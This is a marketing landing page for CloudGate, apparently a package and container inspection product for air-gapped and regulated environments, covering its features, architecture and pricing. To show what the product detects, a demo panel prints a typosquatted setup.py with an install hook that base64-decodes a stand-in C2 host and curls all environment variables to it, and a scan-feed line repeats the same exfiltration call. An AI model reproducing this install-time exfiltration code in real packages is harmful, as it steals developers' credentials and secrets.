Secure Package Inspection Platform

Nothing enters uninspected. AI-powered sheepdip for every package, container, and artefact entering your environment

CloudGate sits at the boundary of your infrastructure and inspects everything that crosses it — pip packages, npm modules, RPMs, ISOs, container images, Terraform modules — before they reach your cluster. AI scans for malicious intent. Zero trust by default.

Get Early Access See How It Works Part of Cloudyard →
cloudgate.io — Inspection Dashboard · registry.internal
⚠ Untrusted Zone — External
📦
numpy==2.1.0
PyPI · 18.4MB
Scanning
📦
requests==2.99.0
PyPI · 3.2MB
Threat
🐳
python:3.12-slim
Docker Hub · 48MB
Scanning
📦
npm · 1.1MB
Queued
💿
ubuntu-24.04.iso
Canonical · 2.1GB
Queued
// Scan Queue
numpy==2.1.0● scanning
requests==2.99.0✗ blocked
python:3.12-slim● scanning
ubuntu-24.04.iso○ queued
1,842
Passed
14
Blocked
3
Scanning
12
Quarantine
✓ Trusted Zone — Internal Registry
📦
pandas==2.2.3
Signed · SHA256 verified · 9h ago
Clean
🐳
nginx:1.27-alpine
OCI · CVE scan passed · 2d ago
Clean
📦
torch==2.4.1+cu121
PyPI mirror · AI scan passed · 1d ago
Clean
🏗
aws/vpc v5.1.0
Terraform · Signed · 3d ago
Clean
📦
npm mirror · No malicious scripts · 5h ago
Clean
100%Artefacts inspected before admission
0Docker Hub API rate limit hits
AIMalicious intent scanning on every file
Air-gapData diode & one-way transfer support
The Problem

Your software supply chain is
an open front door.

Every pip install, docker pull, and npm install is an implicit trust decision. Most organisations make them blindly, at scale, across hundreds of developers — often in regulated or air-gapped environments where a single malicious package can be catastrophic.

🐳

Docker Hub Rate Limits

A 100-node Kubernetes cluster burning through Docker Hub pull limits is a Monday morning incident waiting to happen. Every CI pipeline grinding to a halt because anonymous pulls are throttled. CloudGate proxies and caches everything — one pull from the source, served indefinitely from your internal OCI registry.

☠️

Supply Chain Attacks

Typosquatting, dependency confusion, malicious postinstall scripts — supply chain attacks hit PyPI, npm and RubyGems hundreds of times per year. Your developers don't read every package they install. CloudGate's AI engine does, flagging exfiltration patterns, obfuscated code, and suspicious network calls before the package ever reaches your cluster.

🔒

The Air-Gap Compliance Problem

Regulated environments — financial services, defence, healthcare, government — often mandate full air-gap. But developers still need packages. The current solution is manual, error-prone, and impossible to audit at scale. CloudGate is purpose-built for one-way transfer across data diodes: everything inspected, nothing unaccounted for.

How It Works

The sheepdip pipeline.

Every artefact entering your environment passes through the same inspection pipeline regardless of type. The result is binary: it enters your trusted internal registry, or it doesn't.

🔍 Live Scan Feed
Live
14:32:01
numpy==2.1.0 (PyPI) PASS
CVE clean · AI scan clean · SHA256 verified · cached
🚨 THREAT BLOCKED — requests==2.99.0 (PyPI) @ 14:31:44
AI engine detected credential exfiltration pattern in setup.py. Package is not published by the legitimate requests maintainers. Likely typosquatting attack targeting requests==2.31.0.
→ subprocess.run(['curl','-d',f'key={os.environ}','https://c2.evil.io/...'])
14:31:20
python:3.12-slim (Docker Hub) PASS
Official image · 3 low CVEs (accepted policy) · cached to internal OCI
14:30:55
[email protected] (npm) PASS
Signature verified · postinstall script reviewed · no suspicious calls
14:30:12
torch==2.4.1+cu121 (PyPI) PASS
Large package (856MB) · scan time 14s · SBOM generated · admitted
14:29:44
aws/vpc v5.1.0 (Terraform) PASS
HashiCorp signed · no external data sources · module policy compliant
14:29:01
[email protected] (PyPI) REVIEW
Non-canonical version string · sent to quarantine · security team notified
AI Scanning Engine

CVE databases catch yesterday's threats.
AI catches tomorrow's.

Known CVEs are the tip of the iceberg. The real danger is novel attacks — typosquatted packages, dependency confusion exploits, obfuscated postinstall scripts — that haven't been catalogued yet. CloudGate's AI engine analyses code behaviour, not just signatures.

🤖 AI Behavioural Analysis — requests==2.99.0 setup.py · 2.1KB
setup.py Malicious · 98.4% confidence
1from setuptools import setup
2import os, subprocess, base64
3 
4_d=base64.b64decode('aHR0cHM6Ly9jMi5ldmlsLmlvL2Nv').decode()
5def _ex():
6  subprocess.run(['curl','-s','-d',
7    f'e={os.environ}',_d],capture_output=True)
8 
9setup(name='requests', version='2.99.0',
10    cmdclass={'install': type('I',(object,),{'run':lambda s:_ex()})})
Critical Environment variable exfiltration. Lines 6–7 encode all environment variables and POST them to an external host via curl during package install.
Critical Base64 C2 obfuscation. Line 4 decodes a hardcoded C2 URL at runtime to evade static string scanning.
High Impersonating legitimate package. Declares name requests but is not published by the PSF-verified requests maintainers. Classic typosquatting vector.
Info Package quarantined. Upstream source logged. Security team notified via Slack. YARA rule auto-generated for variant detection.
  • Behavioural pattern detection

    Identifies credential harvesting, reverse shells, C2 beaconing, and data exfiltration patterns — even when obfuscated through base64, eval chains, or dynamic imports.

  • Zero-day supply chain coverage

    Catches attacks that haven't hit CVE databases yet. Dependency confusion, typosquatting, and novel attack patterns are detected by code analysis, not signature matching.

  • YARA rule auto-generation

    When a threat is detected, CloudGate auto-generates YARA rules to catch variants automatically. Your detection improves with every blocked artefact.

  • Full forensic audit trail

    Every blocked package is quarantined with the full analysis report, flagged code snippets, and a chain of custody log — ready for your SOC or compliance audit.

Air-Gap & Data Diode

Built for one-way
transfer environments.

Regulated industries that mandate full air-gap still need software. CloudGate is designed from the ground up for one-way transfer — packages are inspected on the internet-facing side, then passed through the diode as verified, signed artefacts. Nothing unscrutinised crosses the boundary.

  • One-way transfer compatible — inspection happens before the diode. Only verified artefacts cross.
  • Full offline operation — once artefacts are admitted, the internal registry serves them with zero external dependency.
  • Compliance audit logs — every admission is signed, timestamped, and logged in an immutable audit trail with full chain of custody.
  • Manual transfer support — for hard air-gaps, CloudGate can export verified package bundles to removable media, with cryptographic manifests for verification on the far side.
// Data Diode Architecture
Internet-facing
PyPI / npm / Docker Hub
CloudGate Inspector
AI Scan Engine
Quarantine Store
CloudGate
One-way
transfer
Signed
artefacts
only
Air-gapped network
Internal OCI Registry
Internal PyPI Mirror
Internal npm Mirror
Terraform Registry
→ Flow: Upstream fetch → AI + CVE scan → Sign artefact → One-way transfer → Internal registry serves developers.
→ Blocked: Quarantined on internet-facing side. Never crosses boundary. Full forensic report retained.
FINANCE / BANKING
MiFID II, PCI-DSS, FCA infrastructure requirements. Air-gap mandate for trading systems.
DEFENCE / GOV
Classified networks, OFFICIAL-SENSITIVE infrastructure. IL3/IL4 compliance support.
HEALTHCARE
HIPAA, NHS DSP Toolkit. Clinical systems requiring fully isolated software supply chain.
CRITICAL INFRA
Energy, utilities, CNI. NIS2 directive compliance. Physical network isolation requirements.
What CloudGate Inspects

Every artefact type.
One inspection platform.

CloudGate handles the full breadth of artefacts that enter a modern software engineering environment — including the ones that traditional registries ignore entirely.

📦

Language Packages

Proxies and scans PyPI, npm, RubyGems, Maven, Cargo, and Go modules. Eliminates upstream rate limits. AI scans postinstall scripts, setup.py, and package.json hooks for malicious behaviour.

pip/PyPInpm/yarnRubyGemsMavenCargoGo
🐳

Container Images

Full OCI-compatible registry that proxies Docker Hub, GHCR, Quay and any other OCI source. CVE scanning on every layer. No more Docker Hub pull limits grinding your CI. Images cached indefinitely with policy-based retention.

Docker HubGHCRQuayECROCI
💿

ISOs & Binary Artefacts

Operating system ISOs, firmware updates, and binary distributions are hash-verified against canonical upstream sources. AI scans embedded scripts and installation routines. Full chain of custody for every binary that enters your environment.

ISORPMDEBEXE/MSIFirmware
🏗

Infrastructure Modules

Terraform and OpenTofu modules proxied through an internal registry. Modules are inspected for data source exfiltration, external provider calls, and policy violations before being made available to your platform engineers.

TerraformOpenTofuHelm ChartsKustomize
📜

Scripts & Source Code

Shell scripts, PowerShell, Python files, and CI pipeline definitions are scanned for malicious patterns before being admitted to your internal repositories. Especially critical for onboarding third-party automation.

Bash/ShellPowerShellPythonCI Pipelines
🔐

Centralised Services

Beyond inspection, CloudGate provides centralised PKI bootstrapping, IPAM, and authenticated registries for your entire infrastructure. One place to manage what runs in your environment — with full OIDC integration.

PKI / CAIPAMOIDCSigningSBOM
+

Native Cloudyard Integration

CloudGate is purpose-built to integrate with Cloudyard. When deployed alongside the Cloudyard platform, CloudGate automatically becomes the package source for all Coder workspaces, Kubernetes clusters, and CI pipelines. Data scientists get pip freedom — every package they need, already inspected and available from the internal mirror. No tickets. No internet egress from workspaces. Full compliance.

Pricing

Open core.
Enterprise inspection.

The CloudGate proxy and basic scanning is open source. Subscribe for the AI behavioural engine, compliance reporting, air-gap transfer tooling and SLA support.

// Community
Open Source
£0
forever, no limits
Proxy, caching and CVE scanning for all major package ecosystems. Community supported.
  • PyPI, npm, Docker Hub proxy
  • CVE scanning (Trivy + Grype)
  • Internal OCI registry
  • Basic SBOM generation
  • Terraform registry
  • AI behavioural scanning
  • Air-gap transfer tooling
  • Compliance audit reports
  • YARA auto-generation
// Enterprise
CloudGate+
Contact
per deployment / month
Full AI scanning engine, air-gap support, compliance tooling and SLA-backed support.
  • Everything in Community
  • AI behavioural scanning
  • YARA rule auto-generation
  • Air-gap / data diode mode
  • Signed artefact bundles
  • Compliance audit reports
  • SOC alerting integration
  • SLA integration support
  • Cloudyard native integration
// Bundled
Via Cloudyard
Bundled
with Cloudyard+ subscription
Already on Cloudyard? CloudGate+ is included in your subscription. No separate billing.
  • Full CloudGate+ features
  • Auto-wired to all workspaces
  • Coder workspace pip/npm mirror
  • Cluster egress policies
  • Single OIDC identity
  • Unified Grafana dashboards
  • No separate deployment needed
Early Access

Nothing enters
uninspected.

CloudGate is in private development. Register your interest and be first to know when early access opens — particularly if you operate air-gapped or regulated infrastructure.

// Register Interest